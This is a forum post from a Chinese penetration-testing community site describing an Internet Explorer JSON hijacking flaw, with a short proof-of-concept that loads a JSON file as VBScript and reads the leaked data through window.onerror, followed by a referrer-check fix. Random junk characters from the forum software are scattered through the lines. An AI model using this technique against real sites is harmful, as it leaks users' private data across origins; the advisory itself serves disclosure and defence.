中国网络渗透测试联盟

标题: IE通用JSON劫持漏洞 [打印本页]

作者: admin    时间: 2013-2-23 11:33
标题: IE通用JSON劫持漏洞
简要描述:8 N0 v; v' J* D: q0 u7 @
: W. j% q% |6 J6 A
由于某些资源容器对数据处理不当导致json劫持漏洞.$ l% [" f; O$ f: G) t$ R
详细说明:
, b. h* n/ t2 G# Q2 q1 T! t由于ie支持vbscript,所以script元素可以指定成vbscript语言:
9 Z' R# ]4 O9 t8 y<script language=vbscript></script>
6 `& Z( o, I& ]# e! J: u* Y8 q
! @% l0 z( n/ `- D* u4 r, z当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.0 Q. _3 n: J5 a6 A/ t% F7 u
漏洞证明:
- k# z# ]8 S* r<script>
7 _2 J3 G- T' W! Zwindow.onerror=function(_){, w, d7 C! f* c" Q) i
alert(_)" y0 t, R) K0 Z& i# T: H: o+ \8 z
}
' G: b  \# [1 L4 U. T</script>  D1 i8 M3 X2 y, C& T7 N# E: N
<script language=vbscript src=1.json></script>
( ?: a* X& O$ M7 c. t 8 g6 q* ]3 w- w1 }
* ^$ `5 v0 ~3 n% I
1.json:& O* x# r6 F7 ^4 v
[{"name":"sogili","age":19}]
. V  W/ \1 h/ n修复方案:( A" m9 B/ p! R9 W7 T' y) n; ~6 n8 V2 g
网站业务对于这个问题可以通过验证referrer是否为同源来防御




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2